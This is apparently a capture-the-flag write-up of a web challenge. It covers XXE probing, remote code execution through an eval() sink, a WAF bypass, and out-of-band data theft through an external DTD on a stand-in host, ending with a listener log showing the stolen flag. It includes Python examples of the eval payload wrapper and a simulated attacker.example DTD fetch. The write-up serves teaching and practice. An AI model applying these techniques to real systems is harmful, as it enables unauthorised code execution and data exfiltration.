INSANE CTF.ZONE:: WEB-CARD explained

Fig. 1. Landing
Fig. 2. The original response

STAGE 1

First attempt: XXE through request body

Fig. 3. Checking XXE with file-scheme
Fig. 4. Checking XXE with http-scheme

Second attempt: Fuzzing payload format

Fig. 5. Attempt to inject tags into attribute value
Fig. 6. Attempt to send invalid string value for field with type int
Fig. 7. Attempt to send random string as a value of type-attribute for field

Endpoint discovery

Fig. 8. Dirbusting with Burp Suite Intruder (why not? 🙂)
Fig. 9. Checking /dev/api/render

Third attempt: Fuzzing payload format through developers’ endpoint

Fig. 10. Attempt to inject tags into attribute value
Fig. 11. Attempt to send random string as a value of type-attribute for field
Fig. 12. Attempt to send invalid string value for field with type int
Fig. 13. Executing Python code with eval function

We use eval instead of exec because exec always returns None: eval evaluates a single expression and returns its value, so the result of the injected expression is reflected in the response rather than None.
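As an added illustration (not code from the original write-up), the following models the two sinks side by side and shows how to push statements through an eval()-only sink and still get a value back: the statements run via exec() into a throwaway namespace inside an expression, and the expression yields the named result. The sink and helper names are ours.

```python
"""Added example (not from the original write-up): why an eval() sink reflects
the result while an exec() sink reflects None, and how to run statements through
an eval()-only sink and still get the result back. Function names are ours."""


def eval_sink(payload: str) -> str:
    """Models the vulnerable render step: the field value is passed to eval()
    and the resulting value is rendered into the response."""
    return str(eval(payload, {}))  # eval() returns the expression's value


def exec_sink(payload: str) -> str:
    """Same sink built on exec(): exec() always returns None, so the response
    carries nothing useful even though the injected code did run."""
    return str(exec(payload, {}))


def as_expression(statements: str, result_name: str) -> str:
    """Wrap statements (which eval() cannot parse) in a single expression:
    run them with exec() into a fresh namespace, then read result_name out.
    The tuple evaluates left to right, so exec() runs before the lookup."""
    return f"(lambda ns: (exec({statements!r}, ns), ns[{result_name!r}])[1])({{}})"


if __name__ == "__main__":
    print(eval_sink("len('webcard') * 2"))                       # value comes back
    print(exec_sink("len('webcard') * 2"))                       # always None
    print(eval_sink(as_expression("import math\nr = math.factorial(5)", "r")))
```

The third call is the practical payoff: an import and an assignment are statements, so they would be a SyntaxError under eval(), yet wrapped this way they execute and the result still comes back through the same reflected response.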

Investigating server through RCE

{internet} -> 80:[front] -> 4041:[waf]{FLAG is here} -> 3031:[app]
                 |
                 |
                 ------> 3031:[app-dev]

STAGE 2

WAF Bypass

STAGE 3

<!ATTLIST ...> is an attribute-list declaration in a DTD: it names an element, the attributes that element may carry, their types, and their default values.

Note that %height_default; is a parameter entity defined in the internal DTD subset but referenced inside the external DTD. The XML specification forbids parameter-entity references inside markup declarations in the internal subset but allows them in the external subset, so the reference has to live in the remote part anyway. This is also convenient: the remote part of the payload stays constant, and only the internal subset needs editing between attempts.
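To make the mechanism concrete, here is an added example (not from the original write-up, and not the challenge's own parser) using only the standard-library expat bindings. The internal subset defines %height_default; and pulls in an external DTD that references it inside an ATTLIST default; the attacker host, the URL http://attacker.example/ext.dtd and the DTD text are all constructed for the example, and the remote fetch is simulated with an in-memory dict so the code runs offline. The list of fetched system IDs is what a real listener would see in its access log.

```python
"""Added example (not from the original write-up): a parameter entity declared in
the internal DTD subset is expanded inside an external DTD. The remote host is
simulated by an in-memory dict so the example runs offline."""
import xml.parsers.expat as expat

# Constructed sample document: %height_default; is defined here, then the
# (hypothetical) attacker-hosted DTD is pulled in via %ext;.
SAMPLE_XML = b"""<!DOCTYPE card [
  <!ENTITY % height_default '"42"'>
  <!ENTITY % ext SYSTEM "http://attacker.example/ext.dtd">
  %ext;
]>
<card/>"""

# Constructed stand-in for what the attacker host serves. It never changes;
# only the internal subset above is edited between attempts.
REMOTE_DTDS = {
    "http://attacker.example/ext.dtd": b"<!ATTLIST card height CDATA %height_default;>",
}


def parse_with_remote_dtd(xml_bytes: bytes, remote_dtds: dict) -> dict:
    """Parse with parameter-entity processing enabled. Returns the ATTLIST
    declarations seen, the external resources requested, and the attributes
    the root element ends up with (defaults included)."""
    result = {"attlists": [], "fetched": [], "root_attrs": None}
    parser = expat.ParserCreate()
    # Without this, expat ignores %ext; and the external DTD is never loaded.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_ref(context, base, system_id, public_id):
        # Fired for %ext;. context is None for parameter entities. A real
        # parser would issue an HTTP request here; that request is the
        # out-of-band signal the attacker's listener records.
        result["fetched"].append(system_id)
        body = remote_dtds.get(system_id)
        if body is None:
            return 0  # unknown resource: abort the parse
        # The child parser shares the parent's DTD, so %height_default;
        # (declared in the internal subset) is visible while parsing it.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1

    def on_attlist(elname, attname, attr_type, default, required):
        # default is the literal after %height_default; has been substituted.
        result["attlists"].append((elname, attname, attr_type, default))

    def on_start(name, attrs):
        if result["root_attrs"] is None:
            result["root_attrs"] = dict(attrs)

    parser.ExternalEntityRefHandler = on_external_ref
    parser.AttlistDeclHandler = on_attlist
    parser.StartElementHandler = on_start
    parser.Parse(xml_bytes, True)
    return result


if __name__ == "__main__":
    print(parse_with_remote_dtd(SAMPLE_XML, REMOTE_DTDS))
```

Two things to check when reproducing this against a real target: the parser must actually load external parameter entities (here that is the explicit SetParamEntityParsing call; a hardened parser leaves it off), and the external DTD is fetched only once per parse, so the listener sees exactly one request per payload.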

172.42.73.7 - [11/Feb/2021 03:13:37] "GET /?ctf.zone{78806158f1928b18ec1a583c0b9b82c5} HTTP/1.1" 200 -

The whole chain

Fig. 14. The whole chain of exploitation

BONUS: Original design w/o simplification :)

Fig. 15. The original chain of exploitation

Credits

OFFZONE

International community conference for cybersecurity researchers and professionals. No suits, no business — only hardcore research.